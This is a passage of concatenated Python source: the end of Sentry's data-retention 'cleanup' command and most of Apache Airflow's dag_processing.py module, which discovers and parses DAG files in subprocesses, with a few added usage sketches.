models.GroupEmailThread,
models.GroupRuleStatus,
# Handled by TTL
similarity.features,
] + [b[0] for b in EXTRA_BULK_QUERY_DELETES]
configured = True
model, chunk = j
model = import_string(model)
try:
task = deletions.get(
model=model,
query={'id__in': chunk},
skip_models=skip_models,
transaction_id=uuid4().hex,
)
while True:
if not task.chunk():
break
except Exception as e:
logger.exception(e)
finally:
task_queue.task_done()
@click.command()
@click.option('--days', default=30, show_default=True, help='Numbers of days to truncate on.')
@click.option('--project', help='Limit truncation to only entries from project.')
@click.option(
'--concurrency',
type=int,
default=1,
show_default=True,
help='The total number of concurrent worker processes to run.'
)
@click.option(
'--silent', '-q', default=False, is_flag=True, help='Run quietly. No output on success.'
)
@click.option('--model', '-m', multiple=True)
@click.option('--router', '-r', default=None, help='Database router')
@click.option(
'--timed',
'-t',
default=False,
is_flag=True,
help='Send the duration of this command to internal metrics.'
)
@log_options()
def cleanup(days, project, concurrency, silent, model, router, timed):
"""Delete a portion of trailing data based on creation date.
All data that is older than `--days` will be deleted. The default for
    this is 30 days. By default all projects are truncated, but the cleanup
    can be limited to a single project with the `--project` flag, which
    accepts either a project ID or a string of the form `org/project`,
    where both parts are slugs.
"""
if concurrency < 1:
click.echo('Error: Minimum concurrency is 1', err=True)
raise click.Abort()
# Make sure we fork off multiprocessing pool
# before we import or configure the app
from multiprocessing import Process, JoinableQueue as Queue
pool = []
task_queue = Queue(1000)
for _ in xrange(concurrency):
p = Process(target=multiprocess_worker, args=(task_queue,))
p.daemon = True
p.start()
pool.append(p)
from sentry.runner import configure
configure()
from django.db import router as db_router
from sentry.db.deletion import BulkDeleteQuery
from sentry import models
if timed:
import time
from sentry.utils import metrics
start_time = time.time()
# list of models which this query is restricted to
model_list = {m.lower() for m in model}
def is_filtered(model):
if router is not None and db_router.db_for_write(model) != router:
return True
if not model_list:
return False
return model.__name__.lower() not in model_list
# Deletions that use `BulkDeleteQuery` (and don't need to worry about child relations)
# (model, datetime_field, order_by)
BULK_QUERY_DELETES = [
(models.EventMapping, 'date_added', '-date_added'),
(models.EventAttachment, 'date_added', None),
(models.UserReport, 'date_added', None),
(models.GroupEmailThread, 'date', None),
(models.GroupRuleStatus, 'date_added', None),
] + EXTRA_BULK_QUERY_DELETES
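    # Entries may also be 4-tuples (model, datetime_field, order_by, chunk_size);
    # the loop below falls back to a 10000-row chunk size for plain 3-tuples.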
# Deletions that use the `deletions` code path (which handles their child relations)
# (model, datetime_field, order_by)
DELETES = (
(models.Event, 'datetime', 'datetime'),
(models.Group, 'last_seen', 'last_seen'),
)
if not silent:
click.echo('Removing expired values for LostPasswordHash')
if is_filtered(models.LostPasswordHash):
if not silent:
click.echo('>> Skipping LostPasswordHash')
else:
models.LostPasswordHash.objects.filter(
date_added__lte=timezone.now() - timedelta(hours=48)
).delete()
    if is_filtered(models.OrganizationMember):
        if not silent:
            click.echo('>> Skipping OrganizationMember')
    else:
        if not silent:
            click.echo('Removing expired values for OrganizationMember')
        expired_threshold = timezone.now() - timedelta(days=days)
        models.OrganizationMember.delete_expired(expired_threshold)
for model in [models.ApiGrant, models.ApiToken]:
if not silent:
click.echo(u'Removing expired values for {}'.format(model.__name__))
if is_filtered(model):
if not silent:
click.echo(u'>> Skipping {}'.format(model.__name__))
else:
model.objects.filter(expires_at__lt=timezone.now()).delete()
project_id = None
if project:
click.echo(
"Bulk NodeStore deletion not available for project selection", err=True)
project_id = get_project(project)
if project_id is None:
click.echo('Error: Project not found', err=True)
raise click.Abort()
for bqd in BULK_QUERY_DELETES:
if len(bqd) == 4:
model, dtfield, order_by, chunk_size = bqd
else:
chunk_size = 10000
model, dtfield, order_by = bqd
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
).execute(chunk_size=chunk_size)
for model, dtfield, order_by in DELETES:
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
imp = '.'.join((model.__module__, model.__name__))
q = BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
)
for chunk in q.iterator(chunk_size=100):
task_queue.put((imp, chunk))
task_queue.join()
# Clean up FileBlob instances which are no longer used and aren't super
# recent (as there could be a race between blob creation and reference)
if not silent:
click.echo("Cleaning up unused FileBlob references")
if is_filtered(models.FileBlob):
if not silent:
click.echo('>> Skipping FileBlob')
else:
cleanup_unused_files(silent)
# Shut down our pool
for _ in pool:
task_queue.put(_STOP_WORKER)
# And wait for it to drain
for p in pool:
p.join()
if timed:
duration = int(time.time() - start_time)
metrics.timing('cleanup.duration', duration, instance=router)
click.echo("Clean up took %s second(s)." % duration)
def cleanup_unused_files(quiet=False):
"""
Remove FileBlob's (and thus the actual files) if they are no longer
referenced by any File.
We set a minimum-age on the query to ensure that we don't try to remove
any blobs which are brand new and potentially in the process of being
referenced.
"""
from sentry.models import File, FileBlob, FileBlobIndex
if quiet:
from sentry.utils.query import RangeQuerySetWrapper
else:
from sentry.utils.query import RangeQuerySetWrapperWithProgressBar as RangeQuerySetWrapper
cutoff = timezone.now() - timedelta(days=1)
queryset = FileBlob.objects.filter(
timestamp__lte=cutoff,
)
for blob in RangeQuerySetWrapper(queryset):
if FileBlobIndex.objects.filter(blob=blob).exists():
continue
if File.objects.filter(blob=blob).exists():
continue
blob.delete()
|
dag_processing.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import re
import signal
import sys
import time
import zipfile
from abc import ABCMeta, abstractmethod
from collections import defaultdict
from collections import namedtuple
from importlib import import_module
import enum
from typing import Optional
import psutil
from setproctitle import setproctitle
from six.moves import reload_module
from tabulate import tabulate
# To avoid circular imports
import airflow.models
from airflow import configuration as conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.models import errors
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.helpers import reap_process_group
from airflow.utils.db import provide_session
from airflow.utils.log.logging_mixin import LoggingMixin
class SimpleDag(BaseDag):
"""
A simplified representation of a DAG that contains all attributes
required for instantiating and scheduling its associated tasks.
"""
def __init__(self, dag, pickle_id=None):
"""
:param dag: the DAG
:type dag: airflow.models.DAG
:param pickle_id: ID associated with the pickled version of this DAG.
:type pickle_id: unicode
"""
self._dag_id = dag.dag_id
self._task_ids = [task.task_id for task in dag.tasks]
self._full_filepath = dag.full_filepath
self._is_paused = dag.is_paused
self._concurrency = dag.concurrency
self._pickle_id = pickle_id
self._task_special_args = {}
for task in dag.tasks:
special_args = {}
if task.task_concurrency is not None:
special_args['task_concurrency'] = task.task_concurrency
if len(special_args) > 0:
self._task_special_args[task.task_id] = special_args
@property
def dag_id(self):
"""
:return: the DAG ID
:rtype: unicode
"""
return self._dag_id
@property
def task_ids(self):
"""
:return: A list of task IDs that are in this DAG
:rtype: list[unicode]
"""
return self._task_ids
@property
def full_filepath(self):
"""
:return: The absolute path to the file that contains this DAG's definition
:rtype: unicode
"""
return self._full_filepath
@property
def concurrency(self):
"""
:return: maximum number of tasks that can run simultaneously from this DAG
:rtype: int
"""
return self._concurrency
@property
def is_paused(self):
"""
:return: whether this DAG is paused or not
:rtype: bool
"""
return self._is_paused
@property
def pickle_id(self):
"""
:return: The pickle ID for this DAG, if it has one. Otherwise None.
:rtype: unicode
"""
return self._pickle_id
@property
def task_special_args(self):
return self._task_special_args
def get_task_special_arg(self, task_id, special_arg_name):
if task_id in self._task_special_args and special_arg_name in self._task_special_args[task_id]:
return self._task_special_args[task_id][special_arg_name]
else:
return None
class SimpleTaskInstance:
def __init__(self, ti):
self._dag_id = ti.dag_id
self._task_id = ti.task_id
self._execution_date = ti.execution_date
self._start_date = ti.start_date
self._end_date = ti.end_date
self._try_number = ti.try_number
self._state = ti.state
self._executor_config = ti.executor_config
if hasattr(ti, 'run_as_user'):
self._run_as_user = ti.run_as_user
else:
self._run_as_user = None
if hasattr(ti, 'pool'):
self._pool = ti.pool
else:
self._pool = None
if hasattr(ti, 'priority_weight'):
self._priority_weight = ti.priority_weight
else:
self._priority_weight = None
self._queue = ti.queue
self._key = ti.key
@property
def dag_id(self):
return self._dag_id
@property
def task_id(self):
return self._task_id
@property
def execution_date(self):
return self._execution_date
@property
def start_date(self):
return self._start_date
@property
def end_date(self):
return self._end_date
@property
def try_number(self):
return self._try_number
@property
def state(self):
return self._state
@property
def pool(self):
return self._pool
@property
def priority_weight(self):
return self._priority_weight
@property
def queue(self):
return self._queue
@property
def key(self):
return self._key
@property
def executor_config(self):
return self._executor_config
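    # Illustrative usage: SimpleTaskInstance(ti).construct_task_instance(lock_for_update=True)
    # re-queries the TaskInstance row with SELECT ... FOR UPDATE inside the session supplied
    # by @provide_session.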
@provide_session
def construct_task_instance(self, session=None, lock_for_update=False):
"""
Construct a TaskInstance from the database based on the primary key
:param session: DB session.
:param lock_for_update: if True, indicates that the database should
lock the TaskInstance (issuing a FOR UPDATE clause) until the
session is committed.
"""
TI = airflow.models.TaskInstance
qry = session.query(TI).filter(
TI.dag_id == self._dag_id,
TI.task_id == self._task_id,
TI.execution_date == self._execution_date)
if lock_for_update:
ti = qry.with_for_update().first()
else:
ti = qry.first()
return ti
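# Hedged usage sketch (not part of the original module): wrap an ORM
# TaskInstance so it can be shipped across process boundaries cheaply, then
# rebuild the full ORM object from its primary key later. The `ti` argument is
# assumed to come from an existing scheduler query.
def _example_simple_task_instance(ti):
    simple_ti = SimpleTaskInstance(ti)
    # Only plain attributes are kept, so this object is cheap to pickle/send.
    key = (simple_ti.dag_id, simple_ti.task_id, simple_ti.execution_date)
    # Later (possibly in another process) the full TaskInstance can be
    # re-fetched from the database, optionally holding a row lock.
    return key, simple_ti.construct_task_instance(lock_for_update=False)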
class SimpleDagBag(BaseDagBag):
"""
A collection of SimpleDag objects with some convenience methods.
"""
def __init__(self, simple_dags):
"""
Constructor.
:param simple_dags: SimpleDag objects that should be in this bag
:type simple_dags: list[airflow.utils.dag_processing.SimpleDag]
"""
self.simple_dags = simple_dags
self.dag_id_to_simple_dag = {}
for simple_dag in simple_dags:
self.dag_id_to_simple_dag[simple_dag.dag_id] = simple_dag
@property
def dag_ids(self):
"""
:return: IDs of all the DAGs in this bag
:rtype: list[unicode]
"""
return self.dag_id_to_simple_dag.keys()
def get_dag(self, dag_id):
"""
:param dag_id: DAG ID
:type dag_id: unicode
:return: if the given DAG ID exists in the bag, return the SimpleDag
corresponding to that ID. Otherwise, raise an AirflowException
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if dag_id not in self.dag_id_to_simple_dag:
raise AirflowException("Unknown DAG ID {}".format(dag_id))
return self.dag_id_to_simple_dag[dag_id]
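# Hedged usage sketch (not part of the original module): look up a SimpleDag
# by ID and fall back gracefully when the DAG is unknown.
def _example_lookup(simple_dags, dag_id):
    bag = SimpleDagBag(simple_dags)
    if dag_id in bag.dag_ids:
        return bag.get_dag(dag_id)
    return None  # get_dag would raise AirflowException for unknown IDs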
def correct_maybe_zipped(fileloc):
"""
If the path contains a folder with a .zip suffix, the folder is
treated as a zip archive and the path to the zip is returned.
"""
_, archive, _ = re.search(r'((.*\.zip){})?(.*)'.format(re.escape(os.sep)), fileloc).groups()
if archive and zipfile.is_zipfile(archive):
return archive
else:
return fileloc
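# Illustrative expectations for correct_maybe_zipped (hypothetical paths,
# assuming /tmp/dags/bundle.zip is a real zip archive on disk):
#   correct_maybe_zipped('/tmp/dags/bundle.zip/my_dag.py') -> '/tmp/dags/bundle.zip'
#   correct_maybe_zipped('/tmp/dags/my_dag.py')            -> '/tmp/dags/my_dag.py'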
COMMENT_PATTERN = re.compile(r"\s*#.*")
def list_py_file_paths(directory, safe_mode=True,
include_examples=None):
"""
Traverse a directory and look for Python files.
:param directory: the directory to traverse
:type directory: unicode
:param safe_mode: whether to use a heuristic to determine whether a file
contains Airflow DAG definitions
:return: a list of paths to Python files in the specified directory
:rtype: list[unicode]
"""
if include_examples is None:
include_examples = conf.getboolean('core', 'LOAD_EXAMPLES')
file_paths = []
if directory is None:
return []
elif os.path.isfile(directory):
return [directory]
elif os.path.isdir(directory):
patterns_by_dir = {}
for root, dirs, files in os.walk(directory, followlinks=True):
patterns = patterns_by_dir.get(root, [])
ignore_file = os.path.join(root, '.airflowignore')
if os.path.isfile(ignore_file):
with open(ignore_file, 'r') as file:
# If we have new patterns create a copy so we don't change
# the previous list (which would affect other subdirs)
lines_no_comments = [COMMENT_PATTERN.sub("", line) for line in file.read().split("\n")]
patterns = patterns + [re.compile(line) for line in lines_no_comments if line]
# If we can ignore any subdirs entirely we should - fewer paths
# to walk is better. We have to modify the ``dirs`` array in
# place for this to affect os.walk
dirs[:] = [
d
for d in dirs
if not any(p.search(os.path.join(root, d)) for p in patterns)
]
# We want patterns defined in a parent folder's .airflowignore to
# apply to subdirs too
for d in dirs:
patterns_by_dir[os.path.join(root, d)] = patterns
for f in files:
try:
file_path = os.path.join(root, f)
if not os.path.isfile(file_path):
continue
_, file_ext = os.path.splitext(os.path.split(file_path)[-1])
if file_ext != '.py' and not zipfile.is_zipfile(file_path):
continue
if any([re.findall(p, file_path) for p in patterns]):
continue
# Heuristic that guesses whether a Python file contains an
# Airflow DAG definition.
might_contain_dag = True
if safe_mode and not zipfile.is_zipfile(file_path):
with open(file_path, 'rb') as fp:
content = fp.read()
might_contain_dag = all(
[s in content for s in (b'DAG', b'airflow')])
if not might_contain_dag:
continue
file_paths.append(file_path)
except Exception:
log = LoggingMixin().log
log.exception("Error while examining %s", f)
if include_examples:
import airflow.example_dags
example_dag_folder = airflow.example_dags.__path__[0]
file_paths.extend(list_py_file_paths(example_dag_folder, safe_mode, False))
return file_paths
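# Hedged usage sketch (not part of the original module): typical call pattern
# for list_py_file_paths. The directory path is hypothetical.
def _example_list_dag_files():
    # Respect .airflowignore files and the DAG/airflow content heuristic,
    # but do not append the bundled example DAGs.
    return list_py_file_paths('/opt/airflow/dags', safe_mode=True,
                              include_examples=False)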
class AbstractDagFileProcessor(metaclass=ABCMeta):
"""
Processes a DAG file. See SchedulerJob.process_file() for more details.
"""
@abstractmethod
def start(self):
"""
Launch the process to process the file
"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file
"""
raise NotImplementedError()
@property
@abstractmethod
def pid(self):
"""
:return: the PID of the process launched to process the given file
"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self):
"""
:return: when this processor started processing the given file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self):
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
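# A minimal, hedged sketch (not part of the original module) of what a
# concrete AbstractDagFileProcessor subclass has to provide. The bodies are
# placeholders only; the real implementation launches a subprocess that runs
# SchedulerJob.process_file().
class _ExampleDagFileProcessor(AbstractDagFileProcessor):
    def __init__(self, file_path):
        self._file_path = file_path
        self._start_time = None

    def start(self):
        # Real code would launch a subprocess here.
        self._start_time = timezone.utcnow()

    def terminate(self, sigkill=False):
        # Real code would SIGTERM (and optionally SIGKILL) the subprocess.
        pass

    @property
    def pid(self):
        return None

    @property
    def exit_code(self):
        return 0

    @property
    def done(self):
        return True

    @property
    def result(self):
        # Real code returns the list of SimpleDag objects parsed from the file.
        return []

    @property
    def start_time(self):
        return self._start_time

    @property
    def file_path(self):
        return self._file_path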
DagParsingStat = namedtuple('DagParsingStat', ['file_paths', 'done', 'all_files_processed'])
class DagParsingSignal(enum.Enum):
AGENT_HEARTBEAT = 'agent_heartbeat'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
async_mode):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._async_mode = async_mode
# Map from file path to the processor
self._processors = {}
# Map from file path to the last runtime
self._last_runtime = {}
# Map from file path to the last finish time
self._last_finish_time = {}
# Map from file path to the number of runs
self._run_count = defaultdict(int)
# Pipe for communicating signals
self._process = None
self._done = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn = None
self._collected_dag_buffer = []
def start(self):
"""
Launch DagFileProcessorManager processor and start DAG parsing loop in manager.
"""
self._parent_signal_conn, child_signal_conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._file_paths,
self._max_runs,
self._processor_factory,
self._processor_timeout,
child_signal_conn,
self._async_mode,
)
)
self._process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
"""
Should only be used when the DAG file processor manager was launched in sync mode.
Send an agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing.
"""
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
except ConnectionError:
# If the manager died because of an error, it will be noticed and
# restarted when harvest_simple_dags calls _heartbeat_manager.
pass
def wait_until_finished(self):
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
return
@staticmethod
def _run_processor_manager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode):
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
reload_module(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
reload_module(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode)
processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
:return: List of parsing result in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._file_paths = stat.file_paths
self._done = stat.done
self._all_files_processed = stat.all_files_processed
@property
def file_paths(self):
return self._file_paths
@property
def done(self):
return self._done
@property
def all_files_processed(self):
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
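# Hedged sketch (not in the original source) of how a scheduler-like caller
# might drive DagFileProcessorAgent in sync mode. `processor_factory` is a
# stand-in for the scheduler's real factory returning an
# AbstractDagFileProcessor for a given file path.
def _example_run_agent(dag_directory, file_paths, processor_factory):
    from datetime import timedelta
    agent = DagFileProcessorAgent(dag_directory=dag_directory,
                                  file_paths=file_paths,
                                  max_runs=1,
                                  processor_factory=processor_factory,
                                  processor_timeout=timedelta(minutes=5),
                                  async_mode=False)
    agent.start()
    simple_dags = []
    while not agent.done:
        agent.heartbeat()            # ask the manager to run one parsing loop
        agent.wait_until_finished()  # sync mode: block until the loop finishes
        simple_dags.extend(agent.harvest_simple_dags())
    agent.terminate()
    agent.end()
    return simple_dags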
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:type _file_path_queue: list[unicode]
:type _processors: dict[unicode, AbstractDagFileProcessor]
:type _last_runtime: dict[unicode, float]
:type _last_finish_time: dict[unicode, datetime.datetime]
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode=True):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: multiprocessing.connection.Connection
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._async_mode = async_mode
self._parallelism = conf.getint('scheduler', 'max_threads')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.error("Cannot use more than 1 thread when using sqlite. "
"Setting parallelism to 1")
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler',
'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler',
'print_stats_interval')
# Map from file path to the processor
self._processors = {}
# Map from file path to the last runtime
self._last_runtime = {}
# Map from file path to the last finish time
self._last_finish_time = {}
self._last_zombie_query_time = timezone.utcnow()
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.utcnow()
# Last time stats were printed
self.last_stat_print_time = timezone.datetime(2000, 1, 1)
# TODO: Remove magic number
self._zombie_query_interval = 10
# Map from file path to the number of runs
self._run_count = defaultdict(int)
# Manager heartbeat key.
self._heart_beat_key = 'heart-beat'
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler',
'dag_dir_list_interval')
self._log = logging.getLogger('airflow.processor_manager')
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up DAG file processors to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
# In sync mode we want timeout=None -- wait forever until a message is received
poll_time = None # type: Optional[float]
if self._async_mode:
poll_time = 0.0
self.log.debug("Starting DagFileProcessorManager in async mode")
else:
poll_time = None
self.log.debug("Starting DagFileProcessorManager in sync mode")
while True:
loop_start_time = time.time()
if self._signal_conn.poll(poll_time):
agent_signal = self._signal_conn.recv()
self.log.debug("Recived %s singal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
# continue the loop to parse dags
pass
elif not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
continue
self._refresh_dag_dir()
simple_dags = self.heartbeat()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
if not self._async_mode:
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
simple_dags = self.collect_results()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None
for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info("Exiting dag parsing loop as all files "
"have been processed %s times", self._max_runs)
break
if self._async_mode:
loop_duration = time.time() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _refresh_dag_dir(self):
"""
Refresh file paths from dag dir if we haven't done it for too long.
"""
elapsed_time_since_refresh = (timezone.utcnow() -
self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = timezone.utcnow()
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if ((timezone.utcnow() - self.last_stat_print_time).total_seconds() >
self.print_stats_interval):
if len(self._file_paths) > 0:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(
~errors.ImportError.filename.in_(self._file_paths)
)
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"Last Runtime",
"Last Run"]
rows = []
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
if last_runtime:
Stats.gauge(
'dag_processing.last_runtime.{}'.format(file_name),
last_runtime
